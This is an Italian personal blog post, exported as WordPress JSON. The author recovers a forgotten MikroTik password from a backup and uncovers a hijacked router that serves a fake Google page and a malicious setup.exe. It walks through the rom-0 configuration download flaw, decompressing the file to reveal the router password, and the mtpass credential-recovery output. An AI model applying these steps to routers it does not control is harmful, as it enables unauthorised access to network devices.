{"id":1157,"date":"2014-05-22T01:44:11","date_gmt":"2014-05-21T23:44:11","guid":{"rendered":"http:\/\/www.olografix.org\/frank\/wordpress\/?p=1157"},"modified":"2014-05-22T01:44:11","modified_gmt":"2014-05-21T23:44:11","slug":"chiodo-fisso","status":"publish","type":"post","link":"https:\/\/olografix.sugodipesce.net\/frank\/wordpress\/?p=1157","title":{"rendered":"chiodo fisso"},"content":{"rendered":"

questa mattina \u00c3\u00a8 venuto fuori che E. non riusciva ad entrare su uno dei nostri Mikrotik<\/p>\n

o meglio, ci entrava, ma non sapeva qual’era la password (eh beh, pu\u00c3\u00b2 succedere anche questo).<\/p>\n

\u00c3\u00a8 chiaro che uno, una volta dentro<\/em>, ricambia la password e “buonanotte al secchio” (…)<\/p>\n

ma… in generale… c’\u00c3\u00a8 un modo per trovare una password gi\u00c3\u00a0 salvata sul Dude? \ud83d\ude42<\/p>\n

 <\/p>\n

se si esporta la configurazione:<\/p>\n

\/export file name=cazzo.rsc<\/pre>\n
gli utenti non vengono salvati, tantomeno le credenziali<\/p>\n
ma ci tenevo a rispondere alla domanda di E.<\/p>\n
da quel momento, quindi, risolvere questa cosa \u00c3\u00a8 diventato il chiodo fisso della mia giornata.<\/p>\n
 <\/p>\n
pare che esportando piuttosto il backup<\/em><\/p>\n
\/system backup save name=minchia.backup<\/pre>\n
si possa fare qualcosa.<\/p>\n
avevo visto questo sito, e mi sembrava carino:<\/p>\n
https:\/\/aacable.wordpress.com\/tag\/mikrotik-password-recovery\/<\/a><\/p>\n
ciononostante, non volevo compilare nulla di questa roba<\/em> su uno dei nostri server in produzione (estrema paranoia… che chiss\u00c3\u00a0 se mai un giorno mai mi ripagher\u00c3\u00a0).<\/p>\n
mi ero promesso dunque di farlo a casa, in pausa pranzo, sul mio pc<\/p>\n
ma a pranzo non ho pranzato a casa, quindi l’unico momento per farlo sarebbe stato la sera, nella sede del LUG.<\/p>\n
 <\/p>\n
\u00c3\u00a8 bello andare in un posto e avere qualcosa di specifico da fare .<\/p>\n
mi sono seduto. mi sono agganciato con l’eeepc alla rete wifi della sede (dove c’\u00c3\u00a8 un router non gestito da noi) e ho aperto google, per ritrovare l’howto di cui sopra.<\/p>\n
mi sono trovato davanti questo:<\/p>\n
 <\/p>\n
\"google\"<\/a><\/p>\n
 <\/p>\n
 <\/p>\n
 <\/p>\n
 <\/p>\n
 <\/p>\n
 <\/p>\n
onestamente \u00c3\u00a8 tutto molto ben fatto. gran parte dell’umanit\u00c3\u00a0 cliccherebbe senza indugiare.<\/p>\n
se lo si fa, si scarica un bel file setup.exe, proprio come questo: setup.exe<\/a> (magari non farlo…)<\/p>\n
la prima cosa che stuzzica la curiosit\u00c3\u00a0 dello smanettone, \u00c3\u00a8 quantomeno usarci sopra strings:<\/p>\n
 <\/p>\n
sugo@crunchspo:~$ strings downloads\/setup.exe\u00c2\u00a0 |less\r\n ..<\/pre>\n
..<\/pre>\n
SQLGetInstalledDrivers\r\n odbccp32.dll\r\n VerQueryValueA\r\n GetFileVersionInfoA\r\n GetFileVersionInfoSizeA\r\n version.dll\r\n %s\\odbccp32.bad\r\n %s\\%s\r\n The program %s, or one of its DLLs attempted to call the function %s which is not supported in the loaded ODBC installer DLL (%s).\u00c2\u00a0 Press OK to proceed.\r\n The ODBC installer DLL (ODBCCP32.DLL) is not installed on this system.\r\n ODBC Installer Error\r\n ..<\/pre>\n
..<\/pre>\n
SELECT\r\n FROM demo_table ORDER BY\r\n ODBC;DRIVER={%s};DSN='';DBQ=%s\r\n No Excel ODBC driver found\r\n ReadExcel.xls\r\n ..<\/pre>\n
..<\/pre>\n
w w w. m eit u.c o m\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0 <-- sito giapponese che vende cellulari<\/pre>\n
tra l’altro, lorenzo mi ha\u00c2\u00a0 fatto conoscere questo sito dove puoi uploadare merda e vedere come si sarebbero comportarti i pi\u00c3\u00b9 diffusi antivirus:<\/p>\n
https:\/\/www.virustotal.com\/ <\/a>\u00c2\u00a0 (qui ci puoi andare \ud83d\ude42 )<\/p>\n
molto carino, ma come ho fatto ad essere reindirizzatosul finto sito Google? sicuramente tramite DNS.<\/p>\n
ma che DNS sto usando ora, qui?<\/p>\n
 <\/p>\n
sugo@crunchspo:~$ cat \/etc\/resolv.conf\r\n # Generated by NetworkManager\r\n nameserver 23.253.94.129<\/pre>\n
e che \u00c3\u00a8 23.253.94.129<\/strong> ??<\/p>\n
 <\/p>\n
NetRange:\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0 23.253.0.0 - 23.253.255.255\r\n CIDR:\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0 23.253.0.0\/16\r\n OriginAS:\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0 AS19994\r\n NetName:\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0 RACKS-8-NET-15\r\n NetHandle:\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0 NET-23-253-0-0-1\r\n Parent:\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0 NET-23-0-0-0-0\r\n NetType:\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0 Direct Allocation\r\n RegDate:\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0 2013-11-08\r\n Updated:\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0 2013-11-08\r\n Ref:\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0 http:\/\/whois.arin.net\/rest\/net\/NET-23-253-0-0-1<\/pre>\n
OrgName:\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0 Rackspace Hosting<\/p>\n
ho capito subito che qualcuno, finalmente<\/em>, era entrato su quel cazzo di router non-nostro (admin\/admin) e aveva fatto il lavoro.<\/p>\n
oltretutto avevano anche cambiato la password al router, per cui non potevo nemmeno rientrarci.<\/p>\n
ma, come mi ha suggerito valerio \ud83d\ude42 ,\u00c2\u00a0 si poteva tranquillamente sfruttare\u00c2\u00a0 la stessa falla che avevano usato gli amici connessi dallo spazio profondo \ud83d\ude42<\/p>\n
quale falla? semplicemente:<\/p>\n
http:\/\/192.168.1.1\/rom-0<\/p>\n
 <\/p>\n
e ti scarichi il tutto, compresa la password, che per\u00c3\u00b2 va un attimo conquistata.<\/p>\n
ho seguito questo sito, scoprendo di essere veramente lamer nell’utilizzo di git <\/a>\u00c2\u00a0\ud83d\ude00<\/p>\n
https:\/\/www.3noled.in.th\/decrypt-rom-0-file<\/a><\/p>\n
 <\/p>\n
e cos\u00c3\u00ac, finalmente:<\/p>\n
 <\/p>\n
root@crunchspo:~# .\/decompress \/home\/sugo\/downloads\/rom-0<\/pre>\n
root@crunchspo:~# strings \/home\/sugo\/downloads\/rom-0.decomp\r\n 263297<\/strong>\u00c2\u00a0 <-- password in chiaro\r\n public\r\n public\r\n public\r\n 2`Node1\r\n Node2\r\n Node3\r\n Node4\r\n Node5\r\n Node6\r\n Node7\r\n dhcppc\r\n +\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0 *\r\n RT2561_1\r\n default\r\n vlan15\r\n P\/tr069\r\n trendchip\r\n TC3162\r\n DSL-Gateway\r\n Trendchip Product\r\n 0017A5<\/pre>\n
..cos\u00c3\u00ac “ho acceduto” al router, ho avuto conferma che:<\/p>\n
\"dnsss\"<\/a><\/p>\n
 <\/p>\n
 <\/p>\n
 <\/p>\n
 <\/p>\n
 <\/p>\n
 <\/p>\n
 <\/p>\n
e ho poi ricambiato la password (e impedito l’accesso dall’esterno \ud83d\ude42<\/p>\n
 <\/p>\n
e dopo?<\/p>\n
 <\/p>\n
dopo mi sono potuto dedicare al problema di questa mattina, la password di Emi \ud83d\ude42<\/p>\n
ho usato il tool preso da questo sito:<\/p>\n
http:\/\/manio.skyboo.net\/mikrotik\/<\/a><\/p>\n
 <\/p>\n
e..<\/p>\n
 <\/p>\n
root@crunchspo:<\/a>\/usr\/local\/src\/mtpass-0.9# .\/mtpass \/home\/sugo\/downloads\/sugo.backup\r\nmtpass v0.9 - MikroTik RouterOS password recovery tool, (c) 2008-2012 by manio\r\nhttp:\/\/manio.skyboo.net\/mikrotik\/<\/a>\r\n\r\nReading file \/home\/sugo\/downloads\/sugo.backup, 32703 bytes long\r\n\r\nRec# | Username        | Password           | Disable flag   | User comment\r\n--------------------------------------------------------------------------------------------\r\n1    | admin           | <BLANK PASSWORD>   |                |\r\n2    | admin           | Passw-Tadaaaa<\/strong>      |                |\r\n3    | default         | <BLANK PASSWORD>   |                |\r\n4    | default         | <BLANK PASSWORD>   |\r\n<\/pre>\n
 <\/p>\n
\u00c3\u00a8 stata una serata produttiva \ud83d\ude09<\/p>\n
 <\/p>\n
 <\/p>\n
 <\/p>\n
 <\/p>\n
 <\/p>\n
 <\/p>\n","protected":false},"excerpt":{"rendered":"
questa mattina \u00c3\u00a8 venuto fuori che E. non riusciva ad entrare su uno dei nostri Mikrotik o meglio, ci entrava, ma non sapeva qual’era la password (eh beh, pu\u00c3\u00b2 succedere anche questo). \u00c3\u00a8 chiaro che uno, una volta dentro, ricambia la password e “buonanotte al secchio” (…) ma… in generale… c’\u00c3\u00a8 un modo per trovare […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-1157","post","type-post","status-publish","format-standard","hentry","category-tmrc"],"_links":{"self":[{"href":"https:\/\/olografix.sugodipesce.net\/frank\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/1157","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/olografix.sugodipesce.net\/frank\/wordpress\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/olografix.sugodipesce.net\/frank\/wordpress\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/olografix.sugodipesce.net\/frank\/wordpress\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/olografix.sugodipesce.net\/frank\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1157"}],"version-history":[{"count":8,"href":"https:\/\/olografix.sugodipesce.net\/frank\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/1157\/revisions"}],"predecessor-version":[{"id":1168,"href":"https:\/\/olografix.sugodipesce.net\/frank\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/1157\/revisions\/1168"}],"wp:attachment":[{"href":"https:\/\/olografix.sugodipesce.net\/frank\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1157"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/olografix.sugodipesce.net\/frank\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1157"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/olografix.sugodipesce.net\/frank\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1157"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}